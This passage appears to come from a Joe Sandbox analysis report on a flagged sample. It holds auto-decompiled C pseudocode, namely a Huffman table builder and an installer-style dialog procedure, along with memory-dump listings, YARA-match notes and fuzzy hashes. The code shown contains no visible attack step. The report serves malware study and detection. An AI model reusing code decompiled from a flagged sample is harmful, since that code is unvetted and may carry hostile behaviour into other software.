				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x432190;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x432190 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x00407567
0x0040756f
0x00407573
0x00407575
0x00407578
0x0040757a
0x0040757a
0x0040757c
0x00407583
0x00407585
0x00407585
0x0040758b
0x004075a0
0x004075a8
0x004075aa
0x004075ac
0x004075af
0x004075b0
0x004075b0
0x004075b6
0x00000000
0x00000000
0x004075b8
0x004075bb
0x00000000
0x00000000
0x00000000
0x004075bb
0x004075bf
0x004075c2
0x004075c4
0x004075c4
0x004075c7
0x004075cd
0x004075ce
0x00000000
0x00000000
0x00000000
0x004075ce
0x004075d3
0x004075d6
0x004075d8
0x004075d8
0x004075de
0x004075e0
0x004075f1
0x004075e4
0x004075e8
0x0040788d
0x00000000
0x0040788d
0x004075ee
0x004075ef
0x004075ef
0x004075f7
0x004075fa
0x004075fe
0x00407600
0x00407602
0x00407605
0x00000000
0x00000000
0x0040760d
0x00407613
0x00407615
0x00407617
0x00407618
0x0040762d
0x0040762d
0x00407630
0x00407632
0x00407632
0x00407634
0x00407639
0x0040763b
0x00407642
0x00407644
0x0040764c
0x0040764c
0x0040764e
0x0040764f
0x0040765e
0x00407662
0x00407666
0x00407669
0x0040766c
0x00407671
0x00407674
0x0040767a
0x00407681
0x00407687
0x00407880
0x00407880
0x00407885
0x00407894
0x00000000
0x00000000
0x00000000
0x00407885
0x00407694
0x00407697
0x0040769a
0x0040769d
0x004076a1
0x00000000
0x00000000
0x004076ac
0x004076af
0x004076b0
0x004076b2
0x004076b8
0x004076bb
0x00000000
0x00000000
0x004076c1
0x004076c2
0x004076c5
0x004076c8
0x004076cb
0x004076d1
0x004076d3
0x004076d3
0x004076db
0x004076df
0x004076e4
0x00407709
0x0040770f
0x00407711
0x00407713
0x00407716
0x0040771f
0x00000000
0x00000000
0x004076e6
0x004076e6
0x004076ef
0x004076f3
0x00000000
0x00000000
0x00407704
0x00407704
0x00407707
0x00000000
0x00000000
0x004076f7
0x004076fa
0x004076fc
0x00407700
0x00000000
0x00000000
0x00407702
0x00407702
0x00000000
0x00407704
0x00407728
0x0040772e
0x00407738
0x0040773a
0x0040773f
0x00407741
0x00407777
0x00407743
0x00407743
0x00407746
0x00407749
0x00407753
0x00407756
0x0040775d
0x00407768
0x0040776f
0x0040776f
0x00407779
0x0040777c
0x0040777e
0x00407784
0x00407784
0x0040778d
0x00407790
0x00407795
0x004077a4
0x004077ac
0x004077b1
0x004077d5
0x004077dd
0x004077e1
0x004077e7
0x004077b3
0x004077c1
0x004077c4
0x004077ca
0x004077ca
0x004077eb
0x004077a6
0x004077a6
0x004077a6
0x004077fc
0x00407800
0x0040780c
0x00407807
0x0040780a
0x0040780a
0x00407814
0x00407819
0x00407821
0x0040781d
0x0040781f
0x0040781f
0x00407827
0x00407829
0x00407830
0x0040783a
0x00407844
0x00407860
0x00407864
0x004076a9
0x004076af
0x004076b0
0x004076b2
0x004076b8
0x004076bb
0x00000000
0x00000000
0x00000000
0x004076bb
0x00000000
0x00000000
0x00000000
0x00000000
0x00407846
0x00407846
0x00407846
0x0040784b
0x00407854
0x0040785d
0x00000000
0x0040785d
0x0040786a
0x0040786a
0x0040786d
0x00407874
0x00407877
0x00000000
0x0040769a
0x0040761a
0x0040761c
0x0040761c
0x00407620
0x00407623
0x00407624
0x00407624
0x00000000
0x0040761c
0x00407590
0x00407596
0x00000000

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02AD4B87 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff133545f2ebd49b01ea022d25e15871ffa29ad4d42616533a37f6f0ff00b56c
Instruction ID: f2c9c272619c1655ab3f71cfea0b39ad08f7f5c697f7f25a97640bb5ca31447c
Opcode Fuzzy Hash: ff133545f2ebd49b01ea022d25e15871ffa29ad4d42616533a37f6f0ff00b56c
Instruction Fuzzy Hash: A7818A3A4493869FEB25CFA8D8C17DAB361FF5A750B64505ECC658F219DB318043CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02AC6358 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35be559b8865c0194e0186ffe6ad74a031d8606aec40091e295016610742acf4
Instruction ID: ccbbaeb7cf6b11783e46b598ebcfbeb1c8fcca5d74b2fd944d7db2ab54e73cbe
Opcode Fuzzy Hash: 35be559b8865c0194e0186ffe6ad74a031d8606aec40091e295016610742acf4
Instruction Fuzzy Hash: EC7128757043469FDF35AE28CDA57EB32A7AFA1390FA4802EDC5ADB254DB318581CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02AC7405 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba1da6c35cf8dcd708250c88f10e762250016e65dd2d5cfd69889959a56c0865
Instruction ID: d6f330ec5c9b5d98f1c0430061c50b77fcfdb2ee9ccc3e76d04ecb7afa4e09a7
Opcode Fuzzy Hash: ba1da6c35cf8dcd708250c88f10e762250016e65dd2d5cfd69889959a56c0865
Instruction Fuzzy Hash: 1B71577624438A9FEB34DE25DD94BDB33A7EF96780F55412ECC899B104DB308686CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02AC5A80 Relevance: .2, Instructions: 200libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 02AD3203

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: bb8823ae1250f6259588700c25714e9d48a3dff5d74751205cd8f02b56eb13f1
Instruction ID: d125517138f19a8f61b21f33f4800c3247c3f19fb6f823077737952b416e9151
Opcode Fuzzy Hash: bb8823ae1250f6259588700c25714e9d48a3dff5d74751205cd8f02b56eb13f1
Instruction Fuzzy Hash: A7614A75A403498FDF34CE29CCA47CA3373AF957A0F99412DDC99AB204D7359A82CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02AC74FA Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fad6c620cf4aa8b177c600a625cbcbd8bb61c112cd6326ed4607e879c49cbb6
Instruction ID: d55e5db818ed8c612eece4e50a3d43345ace01804f1a6df0f618c6d73c83a853
Opcode Fuzzy Hash: 5fad6c620cf4aa8b177c600a625cbcbd8bb61c112cd6326ed4607e879c49cbb6
Instruction Fuzzy Hash: C85136362483898BEB289E65DDD07DB37ABEF96780F95412ECC859B104D7308586CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02AD4CA0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c529aa7a45f189bf10da69200952899674dcb4edefe5548e8f96d8191bbda81f
Instruction ID: b02c13d7e27da782f238664acf1fabefe195160e1f724c74cb1ab3d26af7973b
Opcode Fuzzy Hash: c529aa7a45f189bf10da69200952899674dcb4edefe5548e8f96d8191bbda81f
Instruction Fuzzy Hash: 3C41DD35508345DFDB288F78C9A57DBB7A2EF063A0F64051ECCD58B685CB324846C792

Uniqueness

Uniqueness Score: -1.00%

Function 02AC75E7 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f47fe4579e19f06410f2b64914a9ce2656e006b15787e1bb5b5bc5ad679c0244
Instruction ID: 428a1a4dbb82bff4f6a2126ba4028a31ca744e0ad9df06bbd54cef3f04fff1fd
Opcode Fuzzy Hash: f47fe4579e19f06410f2b64914a9ce2656e006b15787e1bb5b5bc5ad679c0244
Instruction Fuzzy Hash: FF4187352443499BEB346E359DA47EB3BAB9F92790F86412ECCC59B144C73189C6CF42

Uniqueness

Uniqueness Score: -1.00%

Function 02AC7609 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7ebac2586cd06b0100aace075510f5c1c95b8879b1fef5637bc28ca641d54cc
Instruction ID: 9dc60e65da10f4c9a666fb4297c10157cb7041943f11e73a877eecceee2b1c05
Opcode Fuzzy Hash: c7ebac2586cd06b0100aace075510f5c1c95b8879b1fef5637bc28ca641d54cc
Instruction Fuzzy Hash: B54169362443499BEB246E348DA47EB3BAB9F92790F86012ECCC59B154C72188C6CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02AC75C6 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1556905cfb2454c524f4f32fe9fb0ec62fec54f10a5f28830d3363bcaca2e4bd
Instruction ID: a0728112fe3108ff713ebf034a2d717ea8845795d16698fbec166140573ae230
Opcode Fuzzy Hash: 1556905cfb2454c524f4f32fe9fb0ec62fec54f10a5f28830d3363bcaca2e4bd
Instruction Fuzzy Hash: 923188352443468BEB245E798DA47EB3BABDF92790F82022ECCC5DB194C7318486CF02

Uniqueness

Uniqueness Score: -1.00%

Function 02AC7769 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25227203b46243e00d241caeff6566cd103c34842df0b3aa91c47cfbf6320d6b
Instruction ID: 8cdbc4ecd3cd8660f618ecfd1e6be728dd79c67d89da02eba989f24c11af1996
Opcode Fuzzy Hash: 25227203b46243e00d241caeff6566cd103c34842df0b3aa91c47cfbf6320d6b
Instruction Fuzzy Hash: E5317BB5244386DFDB328E784CA87C6BFA6AF52690F95426DCC84DF595E322C842CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02AD3A08 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50a40656e74edf86b5fbb16571119fd831491bd88a9fee2773cbbae22da06b8e
Instruction ID: 582a42af68d95bb2d856fbc1cca6ba2a412d098f9b92b504885edeb8784456cd
Opcode Fuzzy Hash: 50a40656e74edf86b5fbb16571119fd831491bd88a9fee2773cbbae22da06b8e
Instruction Fuzzy Hash: 3D11D0367411449FCF34CF08C9E4BD933A6AB15710F96409AE84ACB260DB72AD85CF16

Uniqueness

Uniqueness Score: -1.00%

Function 00404F06 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				intOrPtr _t202;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x434f28;
				_v28 =  *0x434f10 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x434f19 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E54(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42d24c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x42d260;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42d24c = 0;
								 *0x42d260 = 0;
								 *0x434f60 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404ED4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x42d260;
									_t201 =  *0x434f28;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x434f2c <= 0) {
										L86:
										if( *0x434fbe == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										_t202 =  *0x433edc; // 0x6c3640
										if( *((intOrPtr*)(_t202 + 0x10)) != 0) {
											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x434f2c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x42d260);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x434f60 = _t291;
					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
					 *0x42d254 =  *0x42d254 | 0xffffffff;
					_t297 = _t258;
					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42d24c = _t260;
